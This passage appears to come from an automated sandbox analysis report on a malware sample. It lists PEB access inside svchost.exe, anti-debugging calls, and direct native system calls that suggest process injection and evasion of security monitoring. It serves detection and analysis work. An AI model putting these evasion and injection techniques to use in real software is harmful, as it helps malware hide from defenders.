            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h] 2_2_036EA456
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362645D mov eax, dword ptr fs:[00000030h] 2_2_0362645D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365245A mov eax, dword ptr fs:[00000030h] 2_2_0365245A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h] 2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h] 2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h] 2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h] 2_2_0362C427
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] 2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] 2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] 2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] 2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] 2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] 2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h] 2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h] 2_2_0366A430
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h] 2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h] 2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h] 2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h] 2_2_036304E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036364AB mov eax, dword ptr fs:[00000030h] 2_2_036364AB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h] 2_2_036644B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h] 2_2_036BA4B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h] 2_2_036EA49A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h] 2_2_0362CB7E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h] 2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h] 2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h] 2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h] 2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h] 2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h] 2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h] 2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h] 2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h] 2_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h] 2_2_036D8B42
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h] 2_2_03628B50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h] 2_2_036DEB50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h] 2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h] 2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h] 2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h] 2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h] 2_2_03704B00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h] 2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h] 2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h] 2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h] 2_2_0365EBFC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h] 2_2_036BCBF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h] 2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h] 2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h] 2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h] 2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h] 2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h] 2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h] 2_2_036DEBD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h] 2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h] 2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h] 2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h] 2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h] 2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h] 2_2_036DEA60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h] 2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h] 2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] 2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] 2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] 2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] 2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] 2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] 2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] 2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h] 2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h] 2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h] 2_2_0366CA24
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h] 2_2_0365EA2E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h] 2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h] 2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h] 2_2_0366CA38
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h] 2_2_036BCA11
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h] 2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h] 2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h] 2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h] 2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h] 2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h] 2_2_03630AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h] 2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h] 2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h] 2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h] 2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h] 2_2_03686AA4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h] 2_2_03704A80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h] 2_2_03668A90
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h] 2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h] 2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h] 2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h] 2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0367096E mov edx, dword ptr fs:[00000030h] 2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h] 2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h] 2_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h] 2_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h] 2_2_036BC97C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h] 2_2_036B0946
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704940 mov eax, dword ptr fs:[00000030h] 2_2_03704940
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B892A mov eax, dword ptr fs:[00000030h] 2_2_036B892A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C892B mov eax, dword ptr fs:[00000030h] 2_2_036C892B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h] 2_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h] 2_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h] 2_2_036BC912
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h] 2_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h] 2_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h] 2_2_036BE9E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h] 2_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h] 2_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h] 2_2_036C69C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h] 2_2_036649D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h] 2_2_036FA9D3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h] 2_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h] 2_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h] 2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h] 2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h] 2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h] 2_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h] 2_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h] 2_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h] 2_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h] 2_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03660854 mov eax, dword ptr fs:[00000030h] 2_2_03660854
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h] 2_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h] 2_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h] 2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h] 2_2_03652835
            Source: C:\Users\user\Desktop\0XLuA614VK.exe Code function: 0_2_00F80B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00F80B62
            Source: C:\Users\user\Desktop\0XLuA614VK.exe Code function: 0_2_00F52622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F52622
            Source: C:\Users\user\Desktop\0XLuA614VK.exe Code function: 0_2_00F4083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F4083F
            Source: C:\Users\user\Desktop\0XLuA614VK.exe Code function: 0_2_00F409D5 SetUnhandledExceptionFilter, 0_2_00F409D5
            Source: C:\Users\user\Desktop\0XLuA614VK.exe Code function: 0_2_00F40C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00F40C21

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtUnmapViewOfSection: Direct from: 0x76EF2D3C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe NtDelayExecution: Direct from: 0x76EF2DDC
